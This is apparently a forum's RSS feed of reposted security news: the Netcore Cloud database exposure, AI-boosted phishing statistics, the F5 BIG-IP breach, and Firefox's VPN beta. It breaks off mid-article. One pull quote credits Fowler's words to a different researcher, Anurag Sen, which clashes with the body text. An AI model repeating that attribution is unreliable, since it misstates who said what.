	This time, the leak involves a company called Netcore Cloud Pvt. Ltd, based in Mumbai, India. <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://netcorecloud.com/" href="https://netcorecloud.com/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">Netcore's website</a> states that its <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/artificial-intelligence" data-before-rewrite-redirect="https://www.windowscentral.com/tag/artificial-intelligence" href="https://www.windowscentral.com/artificial-intelligence" rel="external nofollow">AI</a>-powered "comprehensive customer experience platform" is trusted by more than 6,500 brands around the world, so it's not like it's a small company.
</p>

<p>
	 
</p>


<p id="e62b5aee-1fa3-4f87-ba51-540c8130ce2c-2">
	An unencrypted database with roughly 40 billion records — coming out to about 13TB of data — was discovered by cybersecurity researcher Jeremiah Fowler, who tipped off <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.websiteplanet.com/news/netcore-cloud-breach-report/" href="https://www.websiteplanet.com/news/netcore-cloud-breach-report/" referrerpolicy="no-referrer-when-downgrade" target="_blank" rel="external nofollow">Website Planet</a> with his findings.
</p>

<p>
	 
</p>

<p id="05da0e13-b76e-47ac-bd8a-87b32486de3d">
	The 40 billion records contained "copious amounts of email addresses, message subjects, and more," as well as banking and healthcare notices, including "partial account numbers and specific information" deemed as too sensitive to be exposed publicly. Fowler says he "saw numerous records marked as confidential" while scouring the database.
</p>

<figure id="84507c59-90b0-46d1-838d-e2fe10249560">
	<blockquote class="QuoteNewsStyle">
		<p>
			I saw numerous records marked as confidential — all exposed, all unencrypted.
		</p>

		<p>
			 
		</p>

		<p>
			<em><cite>— Security researcher Anurag Sen, after discovering 13TB of marketing data left wide open.</cite></em>
		</p>
	</blockquote>
</figure>

<p id="8f3a4836-3b24-471f-ac64-061682159aab">
	Fowler says the database lacked password protection and encryption of any sort, meaning anyone who stumbled on (or was tipped off to) the database could freely browse its contents.
</p>

<p>
	 
</p>

<p>
	Upon discovering the security faux pas, Fowler contacted Netcore, as much of the information he found was connected to the company. Fowler says that access to the open database was restricted on the same day he sent the notice.
</p>

<p>
	 
</p>

<p>
	It's important to point out that it remains unclear if Netcore itself was managing the database or if the task was farmed out to a third party. Fowler also has no idea how long the unencrypted information was on the web, or if anyone else had accessed it before he tipped off Netcore.
</p>

<div id="slice-container-newsletterForm-articleInbodyContent-754yKLRpnNeRhuM6Ksfihd">
	<div data-hydrate="true">
		<h2 id="bad-actors-can-do-a-lot-of-damage-with-only-a-few-emails-3">
			Bad actors can do a lot of damage with only a few emails
		</h2>

		<p id="a3e20541-cb52-4b89-aa16-fcf9bb3cf0e9">
			You might be surprised at the ingenuity working behind the scenes of hacking and phishing schemes. Unfortunately, it doesn't take a lot of information for bad actors to get started on their next scam.
		</p>

		<p>
			 
		</p>

		<p>
			As Fowler points out in his report, email addresses and records can be enough for bad actors to create a profile of a victim, which can ultimately lead to a higher chance of being successful with phishing attempts.
		</p>

		<p>
			 
		</p>

		<p>
			Say a bad actor knows that a specific email address — which often contains a full name — receives messages from a specific company, like a telecom. The scammer could create an email that looks official, asking for sensitive details within the scope of your working relationship with the telecom.
		</p>

		<p>
			 
		</p>

		<p>
			These details, which are readily handed over to an entity you believe is legitimate, can then be added to the profile that's already underway. With enough work, risks of "social-engineering, account or password recovery, or even account takeover attempts" are possible.
		</p>

		<p>
			 
		</p>

		<p>
			Fowler makes it clear that he's not implying that this data breach related to Netcore has resulted in this sort of criminal activity, but that he's only giving hypothetical situations for "educational purposes."
		</p>

		<h2 id="add-it-to-the-pile-of-major-data-breaches-in-2025-3">
			Add it to the pile of major data breaches in 2025
		</h2>

		<div>
			<div>
				<p>
					<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-320-80.jpg.webp 320w" type="image/webp"> <img alt="Asterisks on a pink background over a black and white human hand." class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/JGxDi8kyqvrV5bYdM45XYF-1024-80.jpg"> </source></picture>
				</p>

				<p>
					<em><span>2025 has had some major data breaches, and I don't expect them to stop anytime soon. </span></em>
				</p>

				<p>
					<em><span itemprop="copyrightHolder">(Image credit: Getty Images | Boris Zhitkov)</span></em>
				</p>

				<p>
					 
				</p>

				<p id="8be66479-5662-4d32-bbbf-dc0ab50910cd">
					The 13TB trove of potentially sensitive data uncovered by Fowler is, unfortunately, just another unnerving cyber situation in 2025.
				</p>

				<p>
					 
				</p>

				<p>
					Working back in time from the present, there was the notable <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/gaming/pc-gaming/hackers-infiltrate-discords-id-checks-and-its-bad-news-70-000-users-personal-data-exposed" href="https://www.windowscentral.com/gaming/pc-gaming/hackers-infiltrate-discords-id-checks-and-its-bad-news-70-000-users-personal-data-exposed" target="_blank" rel="external nofollow">Discord data breach </a>from earlier this month that saw the ID photos and personal data of 70,000 users leak out. The hackers demanded a $5 million ransom before dropping it to $3.5 million; <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/discord" href="https://www.windowscentral.com/tag/discord" rel="external nofollow">Discord</a> refused to pay.
				</p>

				<p>
					 
				</p>

				<p>
					Then there was the <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/plex-was-hacked-security-incident-may-have-compromised-your-account-information-heres-what-to-do" href="https://www.windowscentral.com/software-apps/plex-was-hacked-security-incident-may-have-compromised-your-account-information-heres-what-to-do" target="_blank" rel="external nofollow">September Plex leak</a> involving emails and hashed passwords, which resulted in a strong suggestion from Plex for users to change their credentials.
				</p>

				<p>
					 
				</p>

				<p>
					In June, it was reported that <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/16-billion-accounts-in-largest-data-breach" href="https://www.windowscentral.com/software-apps/16-billion-accounts-in-largest-data-breach" target="_blank" rel="external nofollow">16 billion accounts and their credentials — aka "the largest data breach" — had been exposed</a>, including passwords for Facebook, Google, and Apple.
				</p>

				<figure id="3b37e9d6-a3a0-41c4-8788-48304ecb6ceb">
					<blockquote class="QuoteNewsStyle">
						<p>
							This wasn’t a breach. It was a billboard.
						</p>

						<p>
							 
						</p>

						<p>
							<em><cite>— 40 billion records, including names, emails, and device info, left exposed by a company that sells trust for a living.</cite></em>
						</p>
					</blockquote>
				</figure>

				<p id="1ad7dfa7-0835-464e-840e-3f0391c6b45a">
					And in April, Elon Musk's X — formerly known as Twitter — was hit by a <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/twitter/elon-musks-x-might-have-a-mole-problem" href="https://www.windowscentral.com/software-apps/twitter/elon-musks-x-might-have-a-mole-problem" target="_blank" rel="external nofollow">data leak containing 2.8 billion user IDs</a>. The hackers claimed that they attempted to contact X with the information; following repeated rebukes, the hackers released the information publicly.
				</p>

				<p>
					 
				</p>

				<p>
					So, what can you do to mitigate the chances of your data leaking out to the public? Unfortunately, once it's in the hands of a corporation, there's not much that you can do other than hope security measures are up to snuff.
				</p>

				<p>
					 
				</p>

				<p>
					All I can say is, remain vigilant about <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/windows-11/how-to-report-phishing-emails-to-microsoft-in-outlook-for-windows-11" href="https://www.windowscentral.com/software-apps/windows-11/how-to-report-phishing-emails-to-microsoft-in-outlook-for-windows-11" rel="external nofollow">email phishing attempts</a>. Don't click links you don't recognize, and always check a sender's email address for irregularities. Stay away from unsecured websites, and keep your PC up to date.
				</p>

				<p>
					 
				</p>

				<p>
					As always, use strong passwords (ideally randomly generated using a password manager), update them frequently, and use <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/how-set-two-step-verification-microsoft-accounts" href="https://www.windowscentral.com/how-set-two-step-verification-microsoft-accounts" rel="external nofollow">multi-factor authentication</a> in case anyone does get a hold of your credentials.
				</p>

				<p>
					 
				</p>

				<p>
					<a href="https://www.windowscentral.com/hardware/storage/13tb-40-billion-records-data-leak-netcore" rel="external nofollow">Source</a>
				</p>

				<p>
					<span style="font-size:12px;"><em>Posted Saturday 18 October 2025 at 3:41 am AEST (my time).</em></span>
				</p>

			</div>
		</div>
	</div>
</div>
]]></description><guid isPermaLink="false">31942</guid><pubDate>Fri, 17 Oct 2025 17:42:25 +0000</pubDate></item><item><title>People are falling for AI phishing attempts 4.5x more often than human ones but the solutions are the same as ever</title><link>https://nsaneforums.com/news/security-privacy-news/people-are-falling-for-ai-phishing-attempts-45x-more-often-than-human-ones-but-the-solutions-are-the-same-as-ever-r31935/</link><description><![CDATA[<p>
	There's a peculiar tint to the modern digital landscape: everything is somehow both the same as it's always been, and yet entirely different. We still use Google, but we get a handy AI summary up top. We still get phished, but it's being done to us by AI. On this latter point, Microsoft's 2025 Digital Defense Report (PDF warning) points out that AI is now actually 4.5x more successful at getting users to click malicious links than standard attempts (via The Register).
</p>

<p>
	 
</p>

<p>
	More specifically, "AI-automated phishing emails achieved 54% click-through rates compared to 12% for standard attempts" because "AI enables more targeted phishing and better phishing lures." The bulk of the data from the report is collected from Microsoft's fiscal year 2025, from July 1, 2024 to June 30, 2025.
</p>

<p>
	 
</p>

<p>
	In addition, "AI automation has the potential to increase phishing profitability by up to 50 times by scaling highly targeted attacks to thousands of targets at minimal cost. This massive return on investment will incentivise cyber threat actors who aren’t yet using AI to add it to their toolbox in the future."
</p>

<p>
	 
</p>

<p>
	Phishing is the attempt to trick people into clicking malicious links or downloading malicious files by pretending to be legitimate. For instance, it might be an email pretending to be from your employer, trying to get you to download an infected file that's disguised as an innocent presentation or spreadsheet. Or it might send you to a website that will ask for your details.
</p>

<p>
	 
</p>

<p>
	Microsoft explains that AI can "automate phishing campaigns, generate deepfakes, and craft highly convincing fraudulent messages." That makes sense because AI has developed enough that it can craft exploits and attacks that a very intelligent and knowledgeable bad actor could.
</p>

<p>
	 
</p>

<p style="text-align:center;">
	<span style="font-size:12px;"><img alt="dcBbYJeH9xN4gK6jiyhNNm-1200-80.jpg.webp" class="ipsImage" data-ratio="75.10" height="405" width="720" src="https://cdn.mos.cms.futurecdn.net/dcBbYJeH9xN4gK6jiyhNNm-1200-80.jpg.webp" /></span>
</p>

<p style="text-align:center;">
	<span style="font-size:12px;">(Image credit: seksan Mongkhonkhamsao @ Getty Images)</span>
</p>

<p>
	 
</p>

<p>
	These phishing stats just point towards a more general—and, of course, expected—trend towards AI being used for nefarious purposes, not just for phishing:
</p>

<p>
	 
</p>

<p>
	"We’re witnessing adversaries deploy generative AI for a variety of activities, including scaling social engineering, automating lateral movement, engaging in vulnerability discovery, and even real-time evasion of security controls. Autonomous malware and AI-powered agents are now capable of adapting their tactics on the fly, challenging defenders to move beyond static detection and embrace behavior-based, anticipatory defense."
</p>

<p>
	 
</p>

<p>
	It can be easy to jump on the anti-AI bandwagon upon hearing things like this—and I'm no stranger to such sentiment—but I'm conscious that I'm hearing about this on the same day I'm hearing that AI has discovered a promising new cancer treatment method. Pros and cons, as always.
</p>

<p>
	 
</p>

<p>
	Plus, there's the fact that AI is used to help defend from cyber attacks these days. I suppose that's just what happens in an arms race, though; the neorealist in me sees such tit-for-tat escalations as inevitable to maintain equilibrium between different states and powers.
</p>

<p>
	 
</p>

<p>
	The good news is that it doesn't seem there's much different, in principle, that we should be doing—just ramping up more of the same. For instance, Microsoft says that "no matter how much the cyber threat landscape changes, multifactor authentication (MFA) still blocks over 99% of unauthorized access attempts, making it the single most important security measure an organization can implement."
</p>

<p>
	 
</p>

<p>
	Of course, MFA might do little to prevent you from falling for a phishing attack. On that front, though, Microsoft's recommendations are again more and better implementations of the same defences we're used to: Inbox filters, restrictions on external communications, limiting remote access tools, educating users, and keeping an eye out for common patterns of attack behaviours.
</p>

<p>
	 
</p>

<p>
	<strong><a href="https://www.pcgamer.com/software/security/people-are-falling-for-ai-phishing-attempts-4-5x-more-often-than-human-ones-but-the-solutions-are-the-same-as-ever/" rel="external nofollow">Source</a></strong>
</p>
]]></description><guid isPermaLink="false">31935</guid><pubDate>Fri, 17 Oct 2025 16:02:30 +0000</pubDate></item><item><title>Why the F5 Hack Created an &#x2018;Imminent Threat&#x2019; for Thousands of Networks</title><link>https://nsaneforums.com/news/security-privacy-news/why-the-f5-hack-created-an-%E2%80%98imminent-threat%E2%80%99-for-thousands-of-networks-r31926/</link><description><![CDATA[<h3>
	Networking software company F5 disclosed a long-term breach of its systems this week. The fallout could be severe.
</h3>

<p>
	<span class="lead-in-text-callout">Thousands of networks—many</span> of them operated by the US government and Fortune 500 companies—face an “imminent threat” of being breached by a nation-state hacking group following the breach of a major maker of software, the federal government warned on Wednesday.
</p>

<p>
	 
</p>

<p>
	F5, a Seattle-based maker of networking software, <a class="external-link" data-aps-asc-tag="w050b-20" data-aps-asin="K000154696" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://my.f5.com/manage/s/article/K000154696" href="https://my.f5.com/manage/s/article/K000154696" rel="external nofollow" target="_blank">disclosed the breach</a> on Wednesday. F5 said a “sophisticated” threat group working for an undisclosed nation-state government had surreptitiously and persistently dwelled in its network over a “long term.” Security researchers who have responded to similar intrusions in the past took the language to mean the hackers were inside the F5 network <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://cyberplace.social/@GossiTheDog/115378445416288653" href="https://cyberplace.social/@GossiTheDog/115378445416288653" rel="external nofollow" target="_blank">for years</a>.
</p>

<h2 class="paywall">
	Unprecedented
</h2>

<p>
	During that time, F5 said, the hackers took control of the network segment the company uses to create and distribute updates for BIG-IP, a line of server appliances that F5 <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.f5.com/c/emea-2020/event/f5-myforum" href="https://www.f5.com/c/emea-2020/event/f5-myforum" rel="external nofollow" target="_blank">says</a> is used by 48 of the world’s top 50 corporations. Wednesday’s disclosure went on to say the threat group downloaded proprietary BIG-IP source code and information about vulnerabilities that had been privately discovered but not yet patched. The hackers also obtained configuration settings that some customers used inside their networks.
</p>

<p>
	 
</p>

<p>
	Control of the build system and access to the source code, customer configurations, and documentation of unpatched vulnerabilities has the potential to give the hackers unprecedented knowledge of weaknesses and the ability to exploit them in supply-chain attacks on thousands of networks, many of which are sensitive. The theft of customer configurations and other data further raises the risk that sensitive credentials can be abused, F5 and outside security experts said.
</p>

<p>
	 
</p>

<p>
	Customers position BIG-IP at the very edge of their networks for use as load balancers and firewalls, and for inspection and encryption of data passing into and out of networks. Given BIG-IP's network position and its role in managing traffic for web servers, <a href="https://arstechnica.com/information-technology/2022/05/hackers-are-actively-exploiting-big-ip-vulnerability-with-a-9-8-severity-rating/" rel="external nofollow">previous compromises</a> have allowed adversaries to expand their access to other parts of an infected network.
</p>

<p>
	 
</p>

<p>
	F5 said that investigations by two outside intrusion-response firms have yet to find any evidence of supply-chain attacks. The company attached letters from firms IOActive and NCC Group attesting that analyses of source code and build pipeline uncovered no signs that a “threat actor modified or introduced any vulnerabilities into the in-scope items.” The firms also said they didn’t identify any evidence of critical vulnerabilities in the system. Investigators, which also included Mandiant and CrowdStrike, found no evidence that data from its CRM, financial, support case management, or health systems was accessed.
</p>

<p>
	 
</p>

<p>
	The company released updates for its BIG-IP, F5OS, BIG-IQ, and APM products. CVE designations and other details are <a class="external-link" data-aps-asc-tag="w050b-20" data-aps-asin="K000156572" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://my.f5.com/manage/s/article/K000156572" href="https://my.f5.com/manage/s/article/K000156572" rel="external nofollow" target="_blank">here</a>. Two days ago, F5 <a class="external-link" data-aps-asc-tag="w050b-20" data-aps-asin="K000157005" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://my.f5.com/manage/s/article/K000157005" href="https://my.f5.com/manage/s/article/K000157005" rel="external nofollow" target="_blank">rotated</a> BIG-IP signing certificates, though there was no immediate confirmation that the move is in response to the breach.
</p>

<p>
	 
</p>

<p>
	The US Cybersecurity and Infrastructure Security Agency has <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" href="https://www.cisa.gov/news-events/directives/ed-26-01-mitigate-vulnerabilities-f5-devices" rel="external nofollow" target="_blank">warned</a> that federal agencies that rely on the appliance face an “imminent threat” from the thefts, which “pose an unacceptable risk.” The agency went on to direct federal agencies under its control to take “emergency action.” The UK’s National Cyber Security Centre <a class="external-link" data-event-boundary="click" data-event-click='{"pattern":"ExternalLink"}' data-in-view='{"pattern":"ExternalLink"}' data-include-experiments="true" data-offer-url="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network" href="https://www.ncsc.gov.uk/news/confirmed-compromise-f5-network" rel="external nofollow" target="_blank">issued</a> a similar directive.
</p>

<p>
	 
</p>

<p>
	CISA has ordered all federal agencies it oversees to immediately take inventory of all BIG-IP devices in networks they run or in networks that outside providers run on their behalf. The agency went on to direct agencies to install the updates and follow a threat-hunting guide that F5 has also issued. BIG-IP users in private industry should do the same.
</p>

<p>
	 
</p>

<p>
	<em>This story originally appeared on</em> <em><a href="https://arstechnica.com/security/2025/10/breach-of-f5-requires-emergency-action-from-big-ip-users-feds-warn/" rel="external nofollow">Ars Technica</a>.</em>
</p>

<p>
	 
</p>

<p>
	<a href="https://www.wired.com/story/f5-hack-networking-software-big-ip/" rel="external nofollow">Source</a>
</p>

<hr class="ipsHr">
<p>
	<span style="font-size:12px;"><em>Hope you enjoyed this news post. Feedback welcome.</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>Posted Friday 17 October 2025 at 12:51 pm AEST (my time).</em></span>
</p>

<p>
	<span style="font-size:12px;"><em>News posts... 2023: 5,800+ | 2024: 5,700+ | 2025 (till end of September): 4,533</em></span>
</p>

<p>
	<strong><span style="font-size:12px;"><a href="https://nsaneforums.com/topic/459202-remember-matrix/" rel="">RIP Matrix</a></span></strong>
</p>
]]></description><guid isPermaLink="false">31926</guid><pubDate>Fri, 17 Oct 2025 02:53:07 +0000</pubDate></item><item><title>Firefox gets a new security feature that Edge has had for years &#x2014; here&#x2019;s how it works, who gets access, and how it compares</title><link>https://nsaneforums.com/news/security-privacy-news/firefox-gets-a-new-security-feature-that-edge-has-had-for-years-%E2%80%94-here%E2%80%99s-how-it-works-who-gets-access-and-how-it-compares-r31924/</link><description><![CDATA[<h3>
	The new Firefox VPN is not the same as Mozilla VPN, but it is quite similar to Edge's built-in tool.
</h3>

<p id="09b35dbb-a4c5-41b4-8f47-ef1351111230">
	<a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/mozilla" href="https://www.windowscentral.com/tag/mozilla" rel="external nofollow">Mozilla</a> has cooked up a new way to keep your browser habits safe from spying eyes: <a data-analytics-id="inline-link" data-auto-tag-linker="true" data-before-rewrite-localise="https://www.windowscentral.com/tag/firefox" href="https://www.windowscentral.com/tag/firefox" rel="external nofollow">Firefox</a> VPN. The latest Firefox VPN is currently in a Beta stage for testing, and Mozilla says that it's only available for a limited time to randomly selected users (via <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.techradar.com/vpn/vpn-services/mozilla-is-experimenting-with-a-free-built-in-vpn-in-firefox-but-you-might-not-be-able-to-try-it-yet" href="https://www.techradar.com/vpn/vpn-services/mozilla-is-experimenting-with-a-free-built-in-vpn-in-firefox-but-you-might-not-be-able-to-try-it-yet" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">TechRadar</a>).
</p>

<p>
	 
</p>

<p>
	Firefox VPN is a free addition to the web browser, and the wording in the Mozilla support document suggests that it will remain free after the testing period. Firefox has not placed any data limits, at least during the testing period.
</p>

<p id="09b35dbb-a4c5-41b4-8f47-ef1351111230-2">
	Firefox VPN is designed to work within the Firefox browser only. Any web traffic that originates in the browser is directed through <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/how-manually-configure-vpn-windows-11" href="https://www.windowscentral.com/how-manually-configure-vpn-windows-11" rel="external nofollow">VPN</a> servers managed by Firefox; any other web traffic originating elsewhere is not protected.
</p>

<p>
	 
</p>

<p>
	Mozilla says it works by "concealing your real IP as well as adding a layer of encryption to your communications" on the <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://support.mozilla.org/en-US/kb/use-ip-concealment-in-firefox" href="https://support.mozilla.org/en-US/kb/use-ip-concealment-in-firefox" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">official Firefox VPN support page</a>. Sounds like a standard VPN, albeit with limited scope.
</p>

<p>
	 
</p>

<p>
	Because the new VPN built into Firefox is invite-only while it's being tested, not everyone will get to give it a try. If you're one of the lucky users who is selected for testing, you'll see a prompt pop up when you launch Firefox asking if you'd like to try Firefox VPN.
</p>

<p>
	 
</p>

<p>
	If you don't see the prompt, well, you're out of luck for now.
</p>

<h2 id="this-is-mozilla-s-second-vpn-to-enter-the-market-3">
	This is Mozilla's second VPN to enter the market
</h2>

<p id="31a53c37-d07b-415e-9a48-26434edcf3ca">
	A lot of Firefox users wondered why Mozilla called its first VPN "Mozilla VPN" and not "Firefox VPN" when it launched a few years ago. They now have an answer.
</p>

<p>
	 
</p>

<p>
	Yes, this is Mozilla's second VPN to enter the market. Mozilla VPN officially launched in 2020 following the retirement/rebranding of Firefox Private Network.
</p>

<p>
	 
</p>

<p>
	Mozilla VPN is a full-fledged VPN service that covers your entire PC or device, not just your data in Firefox. <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://support.mozilla.org/en-US/kb/how-download-and-install-mozilla-vpn-windows" href="https://support.mozilla.org/en-US/kb/how-download-and-install-mozilla-vpn-windows" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">Mozilla VPN has a standalone app</a> available for <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/tag/windows-10" href="https://www.windowscentral.com/tag/windows-10" rel="external nofollow">Windows 10</a> and <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/microsoft/windows/windows-11" data-before-rewrite-redirect="https://www.windowscentral.com/software-apps/windows-11" href="https://www.windowscentral.com/microsoft/windows/windows-11" rel="external nofollow">Windows 11</a>, as well as plenty of other devices.
</p>

<p>
	 
</p>

<p>
	As with most VPN services that cover all of your web traffic, Mozilla VPN is not free. You can subscribe on a monthly or yearly basis, and the lowest price you'll get is <a data-analytics-id="inline-link" data-hl-processed="none" data-url="https://www.mozilla.org/en-US/products/vpn/" href="https://www.mozilla.org/en-US/products/vpn/" referrerpolicy="no-referrer-when-downgrade" rel="external nofollow" target="_blank">about $4.99 per month</a> when you subscribe for a full year.
</p>

<p>
	 
</p>

<p>
	Not bad, especially as it allows you to use up to five devices under the same account.
</p>

<p>
	 
</p>

<p>
	But for those who don't want to pay a monthly subscription fee, Firefox VPN should be a tempting feature once it arrives (hopefully for free) for all Firefox users.
</p>

<h2 id="a-free-vpn-i-thought-i-was-supposed-to-avoid-those-3">
	A free VPN? I thought I was supposed to avoid those...
</h2>

<div>
	<div>
		<p>
			<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-320-80.jpg.webp 320w" type="image/webp"> <img alt="FreeVPN.one website featured in the Microsoft Edge browser on Windows 11 (2025)." class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/awFdmiUu5ammAYa7dVHcJL-1024-80.jpg"> </source></picture>
		</p>

		<p>
			<em><span>Free VPNs are generally best avoided, but there are some exceptions. </span></em>
		</p>

		<p>
			<em><span itemprop="copyrightHolder">(Image credit: Future | Daniel Rubino)</span></em>
		</p>

		<p>
			 
		</p>

		<p id="b1b79db1-0bd8-419a-a21b-758651f36214">
			<a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/do-you-need-vpn" href="https://www.windowscentral.com/do-you-need-vpn" rel="external nofollow">VPNs are powerful tools</a> that block third parties and bad actors from seeing the data you send out over the internet. They achieve this by shuttling your data through encrypted tunnels, with endpoint servers managed by the VPN company.
		</p>

		<p>
			 
		</p>

		<p>
			Because whoever is managing the servers can technically see what everyone is doing and where the data is coming from, you always want to select your VPN provider carefully.
		</p>

		<p>
			 
		</p>

		<p>
			Free VPNs are usually the worst offenders when it comes to selling your data that you thought was private. If a VPN service is free, it's often suspected that your data is being sold somewhere.
		</p>

		<p>
			 
		</p>

		<p>
			However, Mozilla says that its new Firefox VPN only collects technical data that's required to keep the service operating smoothly. Mozilla states:
		</p>

		<figure id="5af07d68-2013-4f77-b8c2-b623955e8310">
			<blockquote class="QuoteNewsStyle">
				<p>
					Logs linked to your account are automatically deleted after 3 months. Importantly, Firefox VPN never logs the websites you visit or the content of your communications. For long-term planning, Mozilla keeps overall bandwidth statistics, but these are aggregated across all users and cannot be traced back to you.
				</p>
			</blockquote>
		</figure>

		<p id="c1dbea83-ac1f-468a-8704-6f171b477c66">
			Mozilla has been a popular browser for years, and it has a reputation for being secure and user-friendly. The sentiment among users, however, changed recently after a March 2025 <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/software-apps/browsing/firefox-users-slam-mozilla-over-controversial-data-privacy-update" href="https://www.windowscentral.com/software-apps/browsing/firefox-users-slam-mozilla-over-controversial-data-privacy-update" rel="external nofollow" target="_blank">update to data privacy in Firefox's Terms of Use</a>.
		</p>

		<p>
			 
		</p>

		<p>
			The new terms suggested that Mozilla had a right to leverage user data in ways that would seriously damage its data privacy reputation. Mozilla was quick to update the ToU with clearer wording, and Firefox VP Ajit Varma was quoted as saying:
		</p>

		<p>
			 
		</p>

		<p style="margin-left: 40px;">
			<em>"Mozilla doesn’t sell data about you (in the way that most people think about ‘selling data’), and we don’t buy data about you. We changed our language because some jurisdictions define ‘sell’ more broadly than most people would usually understand that word."</em>
		</p>

		<h2 id="edge-has-had-a-built-in-vpn-since-2023-how-does-firefox-vpn-compare-3">
			Edge has had a built-in VPN since 2023 — how does Firefox VPN compare?
		</h2>

		<div>
			<div>
				<p>
					<picture data-new-v2-image="true"> <source sizes="(min-width: 1000px) 970px, calc(100vw - 40px)" srcset="https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-1200-80.jpg.webp 1200w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-1024-80.jpg.webp 1024w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-970-80.jpg.webp 970w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-650-80.jpg.webp 650w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-480-80.jpg.webp 480w, https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-320-80.jpg.webp 320w" type="image/webp"> <img alt="Microsoft Edge Secure Network" class="ipsImage" data-new-v2-image="true" height="720" width="720" src="https://cdn.mos.cms.futurecdn.net/dfhd8FTMYaXnhZ39mbBVeG-1024-80.jpg"> </source></picture>
				</p>

				<p>
					<em><span>A look at the control panel for Edge Secure Network VPN. </span><span itemprop="copyrightHolder">(Image credit: Future)</span></em>
				</p>

				<p>
					 
				</p>

				<p id="5039e25a-b022-4d88-ae65-18d93e3b2b6e">
					Much like the new Firefox VPN, <a data-analytics-id="inline-link" data-before-rewrite-localise="https://www.windowscentral.com/microsoft-edge-will-soon-support-browsing-vpn-encryption" href="https://www.windowscentral.com/microsoft-edge-will-soon-support-browsing-vpn-encryption" rel="external nofollow"><strong>Microsoft's Edge Secure Network</strong></a> is a VPN designed to protect web traffic originating in the browser only. It began rolling out in 2022 for Windows 11 and Windows 10 and remains available today.
				</p>

				<p>
					 
				</p>

				<p>
